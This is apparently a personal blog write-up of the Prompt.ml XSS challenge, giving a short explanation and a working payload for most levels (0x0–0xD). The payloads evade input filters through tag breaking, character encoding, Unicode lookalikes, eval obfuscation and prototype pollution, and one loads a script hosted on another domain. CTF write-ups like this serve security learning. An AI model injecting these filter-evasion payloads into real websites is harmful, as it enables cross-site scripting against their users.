Ajdin's blog Tags Github RSS

Prompt.ml XSS challenge write up

28 Sep 2020

Prompt.ml is is a XSS injection site inspired by alert(1) to win.

0x0

Just a simple XSS payload, close the last html element and get prompt(1)

"><img src=x onerror="prompt(1)

0x1

We don’t have to close the tag

<img src=x onerror="prompt(1)"

0x2

call the eval function to hex encode ( and ) into \x28 and \x29

<script>eval.call`${'prompt\x281\x29'}`</script>

0x3

call the eval function to hex encode ( and ) into \x28 and \x29

--!> <script>prompt(1);</script><!--

0x4

This level requires to host a .js file which can execute prompt

https://prompt.ml%2f@ajdin.io/prompt.js

0x5

We can’t input onerror= but we can split it into a new line and get our xss payload.

"type=image src=x onerror
="prompt(1)"

0x6

We can see from the comment that javascript: should be disable but if we add the action to the json key we can bypass this

if (!/script:|data:/i.test(document.forms[0].action))`
javascript:prompt(1)#{"action":1}

0x7

If the XSS payload is across multiple inputs we can bypass the input limitation and get prompt(1) to execute

"><svg/a=#"onload='/*#*/prompt(1)'

0x8

I coudn’t get this one to work but the solution is in the Line Separator unicode symbol which breaks out of the comment

0x9

Replacing the first I with a “wierd” unicode char gets us to bypass that filter. For bypassing .toUpperCase() we have to use decimal encoding.

<ımg src=x onerror=&#0000112&#0000114&#0000111&#0000109&#0000112&#0000116&#0000040&#0000049&#0000041>

0xA

We can escape the first regex by adding a sigle quote to the function prompt. It gets removed after running the second regex and we are left with prompt.

p'rompt(1)

0xB

"a"in(prompt(1)) and (prompt(1))in"a" both execute the prompt(1) function because of the in operator.

"(prompt(1))in"

0xC

We can just create a string “prompt(1)” and use eval() to execute it.

eval(String.fromCharCode(112).concat(String.fromCharCode(114)).concat(String.fromCharCode(111)).concat(String.fromCharCode(109)).concat(String.fromCharCode(112)).concat(String.fromCharCode(116)).concat(String.fromCharCode(40)).concat(String.fromCharCode(49)).concat(String.fromCharCode(41)))

0xD

Explanation here.

{"source":" ","__proto__":{"source":"$`onerror=prompt(1)>"}}